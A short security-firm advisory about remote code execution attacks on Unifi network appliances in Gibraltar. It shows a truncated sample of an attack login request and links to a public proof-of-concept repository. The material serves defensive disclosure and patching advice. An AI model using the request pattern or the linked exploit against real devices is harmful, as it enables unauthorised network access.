Remote Code Execution on Unifi devices


A new exploit against Unify network devices, of which there is a large number within Gibraltar, was observed on the 20th of January of this year.

Remote Code Execution on Unifi devices

Posted on 2022-01-29 by Peter Bassill in category Penetration Testing.


Penetration Testing   News   Cyber Essentials  


We are currently monitoring several exploited Unify network appliances throughout Gibraltar. A new exploit against Unify network devices, of which there is a large number within Gibraltar, was observed on the 20th of January of this year. We became aware today that an exploit has been published on the internet and is now in general circulation. I expect to start to see wide-scale exploitation of these appliances in the next five days.

Why is this an issue?

On the 23rd of January we provided a working Proof of Concept exploit to the vendor that would allow an unauthenticated attacker to bypass security controls and join protected networks.

What we have been seeing in a number of cases is the following:

POST /api/login HTTP/2Host: 192.168.77.1Content-Length: 109Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96"...{"username":"testpoc","password":"anything","remember":"","strict":true}

For an indepth look at how this exploit works, and to get a working PoC, check out the work by puzzlepeaches at https://github.com/puzzlepeaches/Log4jUnifi

What do people need to do?

If you use Unify or any Ubiquiti application, contact your IT support company and ensure that the devices have been updated to the latest version. If you are unsure of whether your devices need to be updated, contact us at support@wearehedgehog.com and we will check for you.

As always, Hedgehog Security and our CERT team are here to help. If you have any questions, just let us know. We love talking about penetration testing and cyber security.


Get in Touch

Kindly fill the form and we will get back to you.

Contact us if you are experiencing a Cyber IncidentHaving a Cyber Incident?